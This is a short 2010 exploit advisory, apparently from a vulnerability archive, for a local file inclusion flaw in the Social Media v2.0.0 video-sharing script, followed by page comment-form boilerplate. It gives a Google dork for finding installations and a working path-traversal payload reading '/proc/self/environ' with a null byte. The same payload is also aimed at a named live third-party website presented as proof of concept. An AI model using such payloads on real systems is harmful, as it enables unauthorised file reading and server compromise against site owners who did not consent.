Social Media 2.0.0 local file inclusion

2010.07.29

Credit: OoN_Boy

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

[x]========================================================================================================================================[x]
 | Title            : Social Media v2.0.0 LFI Vulnerabilities
 | Software         : Social Media v2.0.0
 | Vendor           : http://www.mediascripts.com/
 | Demo             : http://www.mediascripts.com/social/
 | Date             : 27 July 2010 ( Indonesia )
 | Author           : OoN_Boy
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Description      :Social Media is the perfect solution to create your own video sharing and uploading community just like Youtube, 
                     Myspace and Metacafe.... this premium package includes the most advanced features on the market today at an extremely 
                     affordable price while offering the potential for you to reach maximum rewards.
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Google Dork      : Social Media
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Exploit          : http://localhost/index.php?view=../../../../../../../../../../../../../../../proc/self/environ%00
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Proof of concept : http://www.theanimestop.com/index.php?view=../../../../../../../../../../../../../../../proc/self/environ%00
 |                  : Nulled Version
[x]========================================================================================================================================[x]
 
 [x]========================================================================================================================================[x]
 | Happy B day My Brother [x]========================================================================================================================================[x]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Social Media 2.0.0 local file inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.